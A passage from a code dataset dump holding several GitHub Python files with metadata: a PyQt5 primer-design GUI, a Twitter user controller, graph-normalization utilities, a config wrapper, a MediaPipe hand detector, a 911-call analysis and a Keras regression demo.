exit_action.triggered.connect(qApp.quit)\n self.statusBar()\n # Устанавливаем в панель меню данный Action.\n menu_bar = self.menuBar()\n file_menu = menu_bar.addMenu('&File')\n file_menu.addAction(exit_action)\n tools_menu = menu_bar.addMenu('&Tools')\n refresh_sibenzym_action = QAction(QIcon(self.IMAGES_PATH + 'refresh_se.png'), \"&Refresh SibEnzym\", self)\n tools_menu.addAction(refresh_sibenzym_action)\n help_menu = menu_bar.addMenu('&Help')\n about_action = QAction(\"&About\", self)\n help_menu.addAction(about_action)\n\n def create_tool_bar(self):\n toolbar = self.addToolBar('ToolBar')\n\n cutAction = QAction(QtGui.QIcon(self.IMAGES_PATH + 'cut.png'), \"Cut to clipboard\", self)\n cutAction.setStatusTip(\"Delete and copy text to clipboard\")\n cutAction.setShortcut(\"Ctrl+X\")\n cutAction.triggered.connect(self.seq_line_edit.cut)\n\n copyAction = QAction(QtGui.QIcon(self.IMAGES_PATH + \"copy.png\"), \"Copy to clipboard\", self)\n copyAction.setStatusTip(\"Copy text to clipboard\")\n copyAction.setShortcut(\"Ctrl+C\")\n copyAction.triggered.connect(self.seq_line_edit.copy)\n\n pasteAction = QAction(QtGui.QIcon(self.IMAGES_PATH + \"paste.png\"), \"Paste from clipboard\", self)\n pasteAction.setStatusTip(\"Paste text from clipboard\")\n pasteAction.setShortcut(\"Ctrl+V\")\n pasteAction.triggered.connect(self.seq_line_edit.paste)\n\n toolbar.addAction(cutAction)\n toolbar.addAction(copyAction)\n toolbar.addAction(pasteAction)\n toolbar.addSeparator()\n\n positionLabel = QLabel(\"Enter position: \", self)\n self.mutationPosition.setMinimum(0)\n self.mutationPosition.setMaximum(50000)\n self.mutationPosition.setValue(0)\n toolbar.addWidget(positionLabel)\n toolbar.addWidget(self.mutationPosition)\n\n search_action = QAction(QIcon(self.IMAGES_PATH + 'find.png'), \"&Search for restriction sites\", self)\n search_action.setStatusTip(\"Search for restriction sites\")\n search_action.triggered.connect(self.on_search_btn_clicked)\n\n build_primers_action = QAction(QIcon(self.IMAGES_PATH + 'primers.png'), \"&Build primers\", self)\n build_primers_action.setStatusTip(\"Build primers\")\n build_primers_action.triggered.connect(self.on_build_primers_btn_clicked)\n\n toolbar.addAction(search_action)\n toolbar.addAction(build_primers_action)\n #toolbar.addSeparator()\n\n def create_enzymes_list(self, tab, enzymes_data):\n # enzymes_list = QListWidget()\n # enzymes_list.addItems(enzymes_data)\n # tab.layout = QVBoxLayout()\n # tab.layout.addWidget(enzymes_list)\n # tab.setLayout(tab.layout)\n header_labels = ['Name', 'Top site', 'Bottom site']\n enzymes_table = QTableWidget(len(enzymes_data), 3)\n enzymes_table.setHorizontalHeaderLabels(header_labels)\n horizontal_header = enzymes_table.horizontalHeader()\n horizontal_header.setStretchLastSection(True)\n for enzyme_row in enzymes_data:\n index = enzymes_data.index(enzyme_row)\n enzymes_table.setItem(index, 0, QTableWidgetItem(enzyme_row.e_name))\n enzymes_table.setItem(index, 1, QTableWidgetItem(enzyme_row.top_site))\n enzymes_table.setItem(index, 2, QTableWidgetItem(enzyme_row.bottom_site))\n tab.layout = QVBoxLayout()\n tab.layout.addWidget(enzymes_table)\n tab.setLayout(tab.layout)\n\n def create_sr_table(self, grid_layout):\n return\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n def on_radio_button_toggled(self):\n radiobutton = self.sender()\n if radiobutton.isChecked():\n # TODO:\n # self.statusBar().showMessage('Selected enzymes type is %s') % radiobutton.e_type\n print(\"test %s\" % radiobutton.e_type)\n\n def on_search_btn_clicked(self):\n # search_btn = self.sender()\n self.statusBar().showMessage(\"Search for restriction sites\")\n sequence_text = self.seq_line_edit.toPlainText().replace(\" \", \"\").replace('\\n', '')\n current_tab = self.tabs.currentIndex()\n # TODO: create the same for NEB tab\n # TODO: parallel processing for usual patterns and wildcard ones\n if current_tab == 1: # SibTab\n search_results = self.search_engine.sib_traverse(sequence_text)\n search_results_wildcard = self.search_engine_wildcard.do_sib_search(sequence_text)\n if current_tab == 0: # NebTab\n search_results = self.search_engine.neb_traverse(sequence_text)\n search_results_wildcard = self.search_engine_wildcard.do_neb_search(sequence_text)\n results_for_table = TransformationHelper.transform_results(search_results, search_results_wildcard)\n self.show_search_results_table(results_for_table)\n\n def on_build_primers_btn_clicked(self):\n self.statusBar().showMessage(\"Build primers\")\n mpos_value = self.mutationPosition.value() - 1\n sequence_text = self.seq_line_edit.toPlainText().replace(\" \", \"\").replace('\\n', '')\n current_tab = self.tabs.currentIndex()\n if current_tab == 1: # SibTab\n primers_results = self.build_primers_engine.bitap_search(sequence_text, mpos_value)\n # TODO: Neb tab\n if current_tab == 0: # NebTab\n primers_results = self.build_primers_engine_neb.bitap_search(sequence_text, mpos_value)\n self.show_build_primers_results_table(primers_results)\n\n def show_search_results_table(self, search_results):\n header_labels = ['Name', 'Sequence', 'Site Length', 'Frequency', 'Cut Positions']\n self.table_widget.setRowCount(len(search_results))\n self.table_widget.setColumnCount(5)\n self.table_widget.setHorizontalHeaderLabels(header_labels)\n horizontal_header = self.table_widget.horizontalHeader()\n horizontal_header.setStretchLastSection(True)\n for site_item in search_results:\n index = search_results.index(site_item)\n self.table_widget.setItem(index, 0, QTableWidgetItem(str(site_item.get_site_names())))\n self.table_widget.setItem(index, 1, QTableWidgetItem(site_item.get_site_sequence()))\n self.table_widget.setItem(index, 2, QTableWidgetItem(str(site_item.get_site_length())))\n self.table_widget.setItem(index, 3, QTableWidgetItem(str(site_item.get_frequency())))\n self.table_widget.setItem(index, 4, QTableWidgetItem(str(site_item.get_cut_positions())))\n\n def show_build_primers_results_table(self, primers_results):\n header_labels = ['Site Names', 'Sequence', 'Site with mismatch', 'Site start position', 'Mismatch positions',\n 'Primer', 'Primer type']\n row_count = 0\n for site, mismatched_sites in primers_results.items():\n row_count += len(mismatched_sites)\n self.table_widget.setRowCount(row_count)\n self.table_widget.setColumnCount(7)\n self.table_widget.setHorizontalHeaderLabels(header_labels)\n index = -1\n for site, mismatched_sites in primers_results.items():\n # index = pr_results.index(site_item)\n row_count += len(mismatched_sites)\n for found_mismatched_site in mismatched_sites:\n index += 1\n self.table_widget.setItem(index, 0, QTableWidgetItem(str(site.get_names())))\n self.table_widget.setItem(index, 1, QTableWidgetItem(site.get_seq()))\n self.table_widget.setItem(index, 2, QTableWidgetItem(found_mismatched_site.get_enzyme_with_mismatch()))\n self.table_widget.setItem(index, 3, QTableWidgetItem(str(found_mismatched_site\n .get_start_pos() + 1)))\n self.table_widget.setItem(index, 4, QTableWidgetItem(str([pos + 1 for pos in found_mismatched_site\n .get_mismatch_positions()])))\n primer = found_mismatched_site.get_primer()\n self.table_widget.setItem(index, 5, QTableWidgetItem(primer.get_primer_sequence()))\n primer_type = (\"Forward\" if primer.get_is_forward() else \"Reverse\")\n self.table_widget.setItem(index, 6, QTableWidgetItem(primer_type))\n self.table_widget.resizeRowsToContents()\n self.table_widget.resizeColumnsToContents()\n horizontal_header = self.table_widget.horizontalHeader()\n horizontal_header.setStretchLastSection(True)\n\n def cursor_position(self):\n cursor_pos = self.seq_line_edit.textCursor().position()\n seq = self.seq_line_edit.toPlainText()\n seq_part = seq[:cursor_pos].replace(\" \", \"\").replace('\\n', '')\n pos = len(seq_part)\n # Mortals like 1-indexed things\n # line = cursor.blockNumber() + 1\n # col = cursor.columnNumber()\n self.statusBar().showMessage(\"Cursor position: {}\".format(pos))\n\n\nif __name__ == \"__main__\":\n import sys\n\napp = QtWidgets.QApplication(sys.argv)\nmw = MainWindow()\nmw.showMaximized() # show()\nsys.exit(app.exec())\n", "repo_name": "ppnati33/primer_designer", "sub_path": "main/ui/MainWindow.py", "file_name": "MainWindow.py", "file_ext": "py", "file_size_in_byte": 15009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QSpinBox", "line_number": 33, "usage_type": "call"}, {"api_name": "main.utils.enzymes_reader.EnzymesReader", "line_number": 34, "usage_type": "call"}, {"api_name": "main.aho_korasick.search.AhoKorasickSearch", "line_number": 35, "usage_type": "call"}, {"api_name": "main.aho_korasick_wildcard.wildcard_search.AhoKorasickWildcard", "line_number": 37, "usage_type": "call"}, {"api_name": "main.bitap_search.custom_bitap.CustomBitapSearch", "line_number": 44, "usage_type": "call"}, {"api_name": "main.bitap_search.custom_bitap.CustomBitapSearch", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 53, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 63, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 64, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 82, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.qApp.quit", "line_number": 122, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.qApp", "line_number": 122, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 129, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 129, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 132, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 138, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 143, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 148, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 148, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 148, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 158, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 165, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 165, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 190, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 191, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 192, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 193, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 201, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 201, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Yes", "line_number": 201, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.No", "line_number": 201, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.No", "line_number": 202, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 202, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Yes", "line_number": 203, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 203, "usage_type": "name"}, {"api_name": "main.utils.search_results_helper.TransformationHelper.transform_results", "line_number": 228, "usage_type": "call"}, {"api_name": "main.utils.search_results_helper.TransformationHelper", "line_number": 228, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 252, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 253, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 254, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 255, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 256, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 273, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 274, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 275, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 276, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 278, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 281, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 283, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 303, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 303, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 303, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 306, "usage_type": "call"}]}
+{"seq_id": "3548710544", "text": "from typing import List, Dict, Set\n\nfrom deps import api\nfrom models import UserModel, TweetModel\n\n\nclass UserController:\n def __init__(self):\n self.tweets: List[TweetModel] = []\n self.user_names: List[str] = []\n self.user_dict: Dict[str, UserModel] = {}\n self.hash_to_user: Dict[str, Set[UserModel]] = {}\n\n def load_from_tweets(self, tweets: List[TweetModel]):\n self.tweets = tweets\n self.user_names = list(set([tweet.user_name for tweet in tweets]))\n\n def get_by_username(self, user_name: str) -> UserModel:\n if user_name in self.user_dict:\n return self.user_dict[user_name]\n\n tweepy_user = api.get_user(user_name)\n user = UserModel.from_tweepy_object(tweepy_user)\n self.user_dict[user.user_name] = user\n\n return user\n\n def load_hash_to_user_dict(self):\n self.hash_to_user = {}\n\n for tweet in self.tweets:\n for hash_tag in tweet.hash_tags:\n if hash_tag not in self.hash_to_user:\n self.hash_to_user[hash_tag] = set()\n\n self.hash_to_user[hash_tag].add(self.get_by_username(tweet.user_name))\n", "repo_name": "supercmmetry/twitter-viz", "sub_path": "controllers/users.py", "file_name": "users.py", "file_ext": "py", "file_size_in_byte": 1165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 9, "usage_type": "name"}, {"api_name": "models.TweetModel", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 11, "usage_type": "name"}, {"api_name": "models.UserModel", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 12, "usage_type": "name"}, {"api_name": "models.UserModel", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "models.TweetModel", "line_number": 14, "usage_type": "name"}, {"api_name": "deps.api.get_user", "line_number": 22, "usage_type": "call"}, {"api_name": "deps.api", "line_number": 22, "usage_type": "name"}, {"api_name": "models.UserModel.from_tweepy_object", "line_number": 23, "usage_type": "call"}, {"api_name": "models.UserModel", "line_number": 23, "usage_type": "name"}, {"api_name": "models.UserModel", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "17430783812", "text": "import numpy as np\r\nimport scipy.sparse as sp\r\nimport torch\r\nimport scipy.io as sio\r\nimport random\r\n\r\n\r\ndef normalize(mx):\r\n \"\"\"Row-normalize sparse matrix\"\"\"\r\n rowsum = np.array(mx.sum(1))\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = sp.diags(r_inv)\r\n mx = r_mat_inv.dot(mx)\r\n return mx\r\n\r\n\r\ndef normalize_adj(adj):\r\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\r\n adj = sp.coo_matrix(adj)\r\n rowsum = np.array(adj.sum(1)) # D\r\n d_inv_sqrt = np.power(rowsum, -0.5).flatten() # D^-0.5\r\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\r\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt) # D^-0.5\r\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo() # D^-0.5AD^0.5\r\n\r\n\r\ndef preprocess_adj(adj):\r\n \"\"\"Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.\"\"\"\r\n adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))\r\n return adj_normalized\r\n\r\n\r\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\r\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\r\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\r\n indices = torch.from_numpy(\r\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\r\n values = torch.from_numpy(sparse_mx.data)\r\n shape = torch.Size(sparse_mx.shape)\r\n return torch.sparse.FloatTensor(indices, values, shape)\r\n\r\n\r\n", "repo_name": "betterzhou/AAGNN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 12, "usage_type": "call"}, {"api_name": "scipy.sparse.diags", "line_number": 13, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 13, "usage_type": "name"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.sparse.diags", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 24, "usage_type": "name"}, {"api_name": "scipy.sparse.eye", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.Size", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.sparse.FloatTensor", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.sparse", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "19334491259", "text": "from configparser import ConfigParser\n\nclass Config():\n def __init__(self, file_name= 'config.ini'):\n self.file_name = file_name\n self.config = ConfigParser()\n self.config.read(self.file_name, encoding=\"utf-8\")\n\n def save(self):\n \"\"\"Save the configuration\"\"\"\n with open(self.file_name,\"w+\",encoding=\"utf-8\") as file_obj:\n self.config.write(file_obj)\n\n def get_config(self, section, option):\n \"\"\"\"Returns the value of option in the section\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n\n if not self.config.has_option(section, option):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section or option\"\n return ret\n\n ret[\"data\"] = self.config[section][option]\n return ret\n \n def set_config(self, section, option, value):\n \"\"\"Set the value in the option of the section, if no the option, to create it \"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n\n if not self.config.has_section(section):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section\"\n elif not self.config.has_option(section, option):\n ret[\"info\"] = \"there is no option, but create one\"\n\n self.config.set(section, option, value)\n self.save()\n return ret\n \n def add_section(self, section):\n \"\"\"Add a section to the configuration\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n if self.config.has_section(section):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there has already this section\"\n return ret\n \n self.config.add_section(section)\n self.save()\n return ret\n\n def remove_section(self, section):\n \"\"\"Remove a section to the configuration\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n if not self.config.has_section(section):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section\"\n return ret\n\n self.config.remove_section(section)\n self.save()\n return ret\n\n def remove_option(self, section, option):\n \"\"\"Remove a option to the configuration\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n\n if not self.config.has_option(section, option):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section or option\"\n return ret \n \n self.config.remove_option(section, option)\n self.save()\n return ret\n\nif __name__ == \"__main__\":\n config = Config()\n print(config.get_config(\"input\", \"suffix\"))\n\n \n", "repo_name": "LeoJiaGeng/JiaGengXiong-Python-Files", "sub_path": "Search/Demo/Public/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 2749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "41479475184", "text": "import cv2\nimport mediapipe as mp\n\nclass handDetector():\n def __init__(self, mode=False, maxHands=2, detectionCon=0.7, trackCon=0.5):\n self.mode = mode\n self.maxHands = maxHands\n self.detectionCon = detectionCon\n self.trackCon = trackCon\n\n self.mpHands = mp.solutions.hands\n self.hands = self.mpHands.Hands(self.mode, self.maxHands,\n self.detectionCon, self.trackCon)\n self.mpDraw = mp.solutions.drawing_utils\n\n def findHands(self, img, draw=True):\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n self.results = self.hands.process(imgRGB)\n if self.results.multi_hand_landmarks:\n for handLms in self.results.multi_hand_landmarks:\n if draw:\n self.mpDraw.draw_landmarks(img, handLms,\n self.mpHands.HAND_CONNECTIONS)\n return img\n\n def findPosition(self, img, draw=True):\n rlmlist = []\n\n if self.results.multi_hand_landmarks:\n if len(self.results.multi_hand_landmarks) == 2:\n rlmlist.append('both')\n elif len(self.results.multi_hand_landmarks) == 1:\n rlmlist.append(self.results.multi_handedness[0].classification[0].label)\n\n for n in self.results.multi_hand_landmarks:\n lmList = []\n myHand = n\n for id, lm in enumerate(myHand.landmark):\n h, w, c = img.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n lmList.append([id, cx, cy])\n if draw:\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n rlmlist.append(lmList)\n\n return rlmlist\n\n\n", "repo_name": "i5han2/Volume_and_Brightness_Control_Using_Hand_Gestures", "sub_path": "handLmModel.py", "file_name": "handLmModel.py", "file_ext": "py", "file_size_in_byte": 1792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "mediapipe.solutions", "line_number": 11, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 43, "usage_type": "attribute"}]}
+{"seq_id": "37017585632", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef split_string(string):\n new_str = string.split(':', 1)\n #print(new_str[0])\n return new_str[0]\n\n\ndmap = {0:'Mon',1:'Tue',2:'Wed',3:'Thu',4:'Fri',5:'Sat',6:'Sun'}\n\nfile911='/home/edoardo/Udemy/DataScience/Dispense/10-Data-Capstone-Projects/911.csv'\n\ndf = pd.read_csv(file911)\n\nprint(df.info())\nprint(df.head())\nprint(df.head(0))\n#print(df['zip'].value_counts())\n#print(df['twp'].value_counts())\n#print(len(df['title'].apply(lambda x: split_string(x)))\ndf['Reason'] = df['title'].apply(lambda x: split_string(x))\n\n#print(df['Reasons'].value_counts())\n#sns.countplot(x = 'Reasons', data = df)\n\n#print(type(df['timeStamp'].values[0]))\ntime = pd.to_datetime(df['timeStamp'].values)\n\ndf['Hour'] = time.hour\ndf['Month'] = time.month\n#df['Day of the week'] = time.dayoftheweek\n\nprint((df['Hour']))\n#print((df['Day of the week']))\n\nsns.countplot(x='Month', hue = 'Reason', data = df)\n#plt.legend()\n\nplt.show()\n\n\n\n", "repo_name": "EdoardoCarlesi/DataScience", "sub_path": "03_capstone_capst.py", "file_name": "03_capstone_capst.py", "file_ext": "py", "file_size_in_byte": 1009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "seaborn.countplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "31297389490", "text": "'''\nWeek 3 - Problem 2\nSolution using Keras\n\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow.compat.v1 as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n# Disable 2.0 behavior\ntf.disable_v2_behavior()\n\n### Generate the data ###\ndef generate_data(random_seed, n_samples):\n tf.set_random_seed(random_seed)\n train_x = np.linspace(0,20,n_samples)\n train_y = 3.7 * train_x + 14 + 4 * np.random.randn(n_samples)\n print(\"X data\")\n print(\"------\")\n print(\"Size: \" + str(np.shape(train_x)))\n print(train_x)\n print(\"Y data\")\n print(\"------\")\n print(\"Size: \" + str(np.shape(train_y)))\n print(train_y)\n plt.plot(train_x, train_y,'o')\n plt.waitforbuttonpress()\n plt.close()\n return(train_x, train_y)\n\ndef model_keras(x_data, y_data, epochs):\n model = Sequential()\n model.add(Dense(1, input_dim=1, kernel_initializer='normal', activation='linear'))\n \n #Compile the model\n model.compile(loss='mean_squared_error', optimizer='rmsprop', metrics=['mse'])\n\n #Dump the model\n model.summary()\n\n #Suppressing the per-epoch messages\n hist = model.fit(x_data, y_data, epochs=epochs, verbose=0)\n\n weightBias = model.layers[0].get_weights()\n #print('Weight and Bias with Keras: \" + weightBias)\n print(weightBias)\n plt.plot(train_x, train_y,'o')\n plt.plot(x_data, weightBias[0][0]*x_data + weightBias[1])\n plt.waitforbuttonpress()\n\ntrain_x, train_y = generate_data(42, 30)\nmodel_keras(train_x, train_y, 20000)\n", "repo_name": "saramach/ucsd-deeplearning-tf-CSE-41312", "sub_path": "Week3/Problem2.py", "file_name": "Problem2.py", "file_ext": "py", "file_size_in_byte": 1536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tensorflow.compat.v1.disable_v2_behavior", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 14, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.set_random_seed", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.waitforbuttonpress", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": 